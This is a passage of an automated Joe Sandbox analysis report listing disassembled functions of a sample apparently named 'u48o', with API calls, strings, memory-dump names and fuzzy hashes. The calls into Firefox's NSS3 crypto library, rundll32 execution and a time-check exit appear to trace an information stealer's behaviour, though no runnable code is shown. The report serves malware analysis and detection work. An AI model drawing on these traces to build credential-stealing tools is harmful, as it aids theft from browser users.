Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

C:\Windows\system32\rundll32.dll, xrefs: 004110BF
"" , xrefs: 004111DC
.dll, xrefs: 00411054
<, xrefs: 004112AC

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 6e7a0100c6f31bb2b4830e58b644d3e2cd34d3a7405b32bd71eb4f71f658ead2
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 6e7a0100c6f31bb2b4830e58b644d3e2cd34d3a7405b32bd71eb4f71f658ead2
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6C29E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C29E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C29E5BC

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C29E525, 6C29E596, 6C29E5A7
database corruption, xrefs: 6C29E52F, 6C29E5B1
%s at line %d of [%.10s], xrefs: 6C29E534, 6C29E5B6

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: ea023c8c376e8a1d7e11b4b194883772c8f0cdd1502e0d4e391774766cb0e8e7
Instruction ID: 8b15c97533b28f47e5205e9fc892d409a53dd5fa0dc06f232cb7e20a1acdbe6f
Opcode Fuzzy Hash: ea023c8c376e8a1d7e11b4b194883772c8f0cdd1502e0d4e391774766cb0e8e7
Instruction Fuzzy Hash: CA315570640B199BD311CEAEC880D6AB7A0FB45715B64497CFC48A7B45F360E849C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6C316420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C315DEF,?,?,?), ref: 6C316456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C315DEF,?,?,?), ref: 6C316476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C315DEF,?,?,?), ref: 6C3164A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C315DEF,?,?,?), ref: 6C3164C2

Strings

]1l, xrefs: 6C316489

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID: ]1l
API String ID: 3886907618-3445790292
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: 95b225f6ef5786b0d83a4f7784035d569d4b50cf740682e5d85c159f5ac11d00
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: FC21EB71A043016FEB285EA9DC45B6376F9EB40308F144538F559C6F41EBB2D554CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C3BAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]:l,00000000,?,?,6C396AC6,?), ref: 6C3BAC2D

Part of subcall function 6C35ADC0: TlsGetValue.KERNEL32(?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE10
Part of subcall function 6C35ADC0: EnterCriticalSection.KERNEL32(?,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE24
Part of subcall function 6C35ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C33D079,00000000,00000001), ref: 6C35AE5A
Part of subcall function 6C35ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE6F
Part of subcall function 6C35ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE7F
Part of subcall function 6C35ADC0: TlsGetValue.KERNEL32(?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AEB1
Part of subcall function 6C35ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AEC9

PK11_FreeSymKey.NSS3(?,@]:l,00000000,?,?,6C396AC6,?), ref: 6C3BAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]:l,00000000,?,?,6C396AC6,?), ref: 6C3BAC59
free.MOZGLUE(8CB6FF01,6C396AC6,?,?,?,?,?,?,?,?,?,?,6C3A5D40,00000000,?,6C3AAAD4), ref: 6C3BAC62

Strings

@]:l, xrefs: 6C3BAC05

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]:l
API String ID: 1595327144-3214526920
Opcode ID: 852718b5e5444e992aa25e53b1fa6850668301047c809adb9a68cbac225c01f8
Instruction ID: 0fe3b2b171908d0ebc7b5ba2a18dd3f692d4b32bcfd4101b5dddb8d79004306e
Opcode Fuzzy Hash: 852718b5e5444e992aa25e53b1fa6850668301047c809adb9a68cbac225c01f8
Instruction Fuzzy Hash: F90128B56006009BDB00EF59E9D0B5677E8AB54B58F188068E9499FB06D731F948CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C2B6D2E Relevance: 7.6, APIs: 5, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6C2A3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2A3C66
Part of subcall function 6C2A3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C2A3D04

memcpy.VCRUNTIME140(?,?,?), ref: 6C2B6DC0
memcpy.VCRUNTIME140(?,?,?), ref: 6C2B6DE5

Part of subcall function 6C2B8010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B807D
Part of subcall function 6C2B8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B80D1
Part of subcall function 6C2B8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B810E
Part of subcall function 6C2B8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2B8140

memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C2B6E7E
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2B6E96
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B6EC2

Part of subcall function 6C2B7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B7E27
Part of subcall function 6C2B7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B7E67

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: _byteswap_ulong$memcpy$_byteswap_ushort
String ID:
API String ID: 3070372028-0
Opcode ID: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction ID: 1bfbe9834fa28f0eedf3e995c2136f96a06085db1623db25d5b42b65642829b9
Opcode Fuzzy Hash: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction Fuzzy Hash: 3D51AD719083569FC724CF25C890B6ABBE5FF88758F048A5DEC9997741E330E918CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0040F200 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F228
strtok_s.MSVCRT ref: 0040F36D

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: cca630b2f95f4e826e9a6c859236e500537583a630315fa027596be9967944d5
Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
Opcode Fuzzy Hash: cca630b2f95f4e826e9a6c859236e500537583a630315fa027596be9967944d5
Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040980B
memset.MSVCRT ref: 0040983E
LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

@, xrefs: 00409847
v10, xrefs: 00409802

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: 6fffcccd7e913edef19ca93c74df1373176caef86faec32c86a0297b7053f467
Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
Opcode Fuzzy Hash: 6fffcccd7e913edef19ca93c74df1373176caef86faec32c86a0297b7053f467
Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6C3A2460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6C447379,00000002,?), ref: 6C3A2493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C3A24B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C447379,00000002,?), ref: 6C3A24EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C447379,00000002,?), ref: 6C3A24F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C447379,00000002,?), ref: 6C3A24FE

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: 5c170838c3c13f4ebf48850dec64382ec7cf2d2109b2da8f5298c1607f1f843d
Instruction ID: 9f582b0d87fc84958f132fb95f51269e2ad2e4bfb569505f026d769078f10b16
Opcode Fuzzy Hash: 5c170838c3c13f4ebf48850dec64382ec7cf2d2109b2da8f5298c1607f1f843d
Instruction Fuzzy Hash: A13104B1A00115AFEB108FE6DD45BBBB7A4EF58308F104125FD5996A80E732D865CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C3144D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C3144FF

Part of subcall function 6C3707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C318298,?,?,?,6C30FCE5,?), ref: 6C3707BF
Part of subcall function 6C3707B0: PL_HashTableLookup.NSS3(?,?), ref: 6C3707E6
Part of subcall function 6C3707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C37081B
Part of subcall function 6C3707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C370825

SECOID_FindOID_Util.NSS3(?), ref: 6C314524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C314537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C314579

Part of subcall function 6C3141B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C3141BE
Part of subcall function 6C3141B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C3141E9
Part of subcall function 6C3141B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C314227
Part of subcall function 6C3141B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C31423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C31459C

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: fafd6b35304ded97675de2977b92743922c60b827d2e2a8d4765856493da9f01
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: D221A1716096159FEB18CE2AEC44F6B37AC9F4165CF140428B815CBE41FB22E904CEA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C31AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C313FFF,00000000,?,?,?,?,?,6C311A1C,00000000,00000000), ref: 6C31ADA7

Part of subcall function 6C3714C0: TlsGetValue.KERNEL32 ref: 6C3714E0
Part of subcall function 6C3714C0: EnterCriticalSection.KERNEL32 ref: 6C3714F5
Part of subcall function 6C3714C0: PR_Unlock.NSS3 ref: 6C37150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C313FFF,00000000,?,?,?,?,?,6C311A1C,00000000,00000000), ref: 6C31ADB4

Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C313FFF,?,?,?,?,6C313FFF,00000000,?,?,?,?,?,6C311A1C,00000000), ref: 6C31ADD5

Part of subcall function 6C36FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C368D2D,?,00000000,?), ref: 6C36FB85
Part of subcall function 6C36FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C36FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C4394B0,?,?,?,?,?,?,?,?,6C313FFF,00000000,?), ref: 6C31ADEC

Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C313FFF), ref: 6C31AE3C

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 97a402a19796099893e22b0cf2ed1b069d32183a18d006a34182a37b0acb599d
Instruction ID: 16677df1afe69ac71d7fb398e166d0064f7423fd167da9a8701cd2e5ded52d51
Opcode Fuzzy Hash: 97a402a19796099893e22b0cf2ed1b069d32183a18d006a34182a37b0acb599d
Instruction Fuzzy Hash: 9F115632E042142BE7109A659C51BFF73F8DF9524DF004228EC9996A41FB21E95C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 004135E0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,04082BB0,?,0041D8AC,?,00000000,?), ref: 0041362C
sscanf.NTDLL ref: 00413659
SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,04082BB0,?,0041D8AC), ref: 00413672
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,04082BB0,?,0041D8AC), ref: 00413680
ExitProcess.KERNEL32 ref: 0041369A

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 2d8e78d0dab9869f9047db96de010d3925a814e04e314d7ab9fafc73e4c55430
Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
Opcode Fuzzy Hash: 2d8e78d0dab9869f9047db96de010d3925a814e04e314d7ab9fafc73e4c55430
Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6C3A04C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C3A461B,-00000004), ref: 6C3A04DF
TlsGetValue.KERNEL32(?,00000000,?,6C3A461B,-00000004), ref: 6C3A0510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C3A0520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C3A461B,-00000004), ref: 6C3A0534
GetLastError.KERNEL32(?,6C3A461B,-00000004), ref: 6C3A0543

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: 31af9e383bb9260d7ca90ab31be49ed5ecac2d08a15b3b82b391be591a1ca93a
Instruction ID: 3de41975705853851ab89fd3287313273030896bcb3c3774a0eb82d943613913
Opcode Fuzzy Hash: 31af9e383bb9260d7ca90ab31be49ed5ecac2d08a15b3b82b391be591a1ca93a
Instruction Fuzzy Hash: 71112771A081819BDF00BBB8DC14B653A68EF1231DF604625E42BD7990EB32D566CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C33CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C351E10: TlsGetValue.KERNEL32 ref: 6C351E36
Part of subcall function 6C351E10: EnterCriticalSection.KERNEL32(?,?,?,6C32B1EE,2404110F,?,?), ref: 6C351E4B
Part of subcall function 6C351E10: PR_Unlock.NSS3 ref: 6C351E76

free.MOZGLUE(?,6C33D079,00000000,00000001), ref: 6C33CDA5
PK11_FreeSymKey.NSS3(?,6C33D079,00000000,00000001), ref: 6C33CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C33D079,00000000,00000001), ref: 6C33CDCF
DeleteCriticalSection.KERNEL32(?,6C33D079,00000000,00000001), ref: 6C33CDE2
free.MOZGLUE(?), ref: 6C33CDE9

Memory Dump Source

